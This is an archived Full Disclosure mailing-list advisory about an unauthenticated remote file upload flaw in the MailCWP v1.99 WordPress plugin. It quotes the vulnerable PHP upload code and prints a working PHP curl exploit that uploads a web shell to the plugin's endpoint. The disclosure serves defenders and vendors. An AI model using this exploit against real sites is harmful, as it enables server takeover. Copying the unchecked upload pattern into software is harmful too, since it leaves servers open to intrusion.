[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

To: Open Source Security <oss-security@xxxxxxxxxxxxxxxxxx>
Subject: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
From: "Larry W. Cashdollar" <larry0@xxxxxx>
Date: Thu, 16 Jul 2015 20:18:11 -0400

Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client 
plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php  doesn't check that a user is authenticated or 
what type of file is being uploaded any user can upload a shell to the target 
wordpress server:

  2 $message_id = $_REQUEST["message_id"];
  3 $upload_dir = $_REQUEST["upload_dir"];
.
.
  8 $fileName = $_FILES["file"]["name"];
  9 move_uploaded_file($_FILES["file"]["tmp_name"], 
"$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http 
server root.

CVEID:
OSVDB:
Exploit Code:
        • <?php
        • /*Larry W. Cashdollar @_larry0
        • Exploit for mailcwp v1.99 shell will be called 1-shell.php.
        • 7/9/2015
        • */
        •         $target_url = 
'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
        •         $file_name_with_full_path = '/var/www/shell.php';
        •  
        •         echo "POST to $target_url $file_name_with_full_path";
        •         $post = array('file' => 
'shell.php','file'=>'@'.$file_name_with_full_path);
        •  
        •         $ch = curl_init();
        •         curl_setopt($ch, CURLOPT_URL,$target_url);
        •         curl_setopt($ch, CURLOPT_POST,1);
        •         curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        •         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        •         $result=curl_exec ($ch);
        •         curl_close ($ch);
        •         echo "<hr>";
        •         echo $result;
        •         echo "<hr>";
        • ?>
        •  
Advisory: http://www.vapid.dhs.org/advisory.php?v=138

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
  - From: Larry W. Cashdollar

Prev by Date: [FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability
Next by Date: Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Previous by thread: [FD] 1503A - Chrome - ui::AXTree::Unserialize use-after-free
Next by thread: Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Index(es):
- Date
- Thread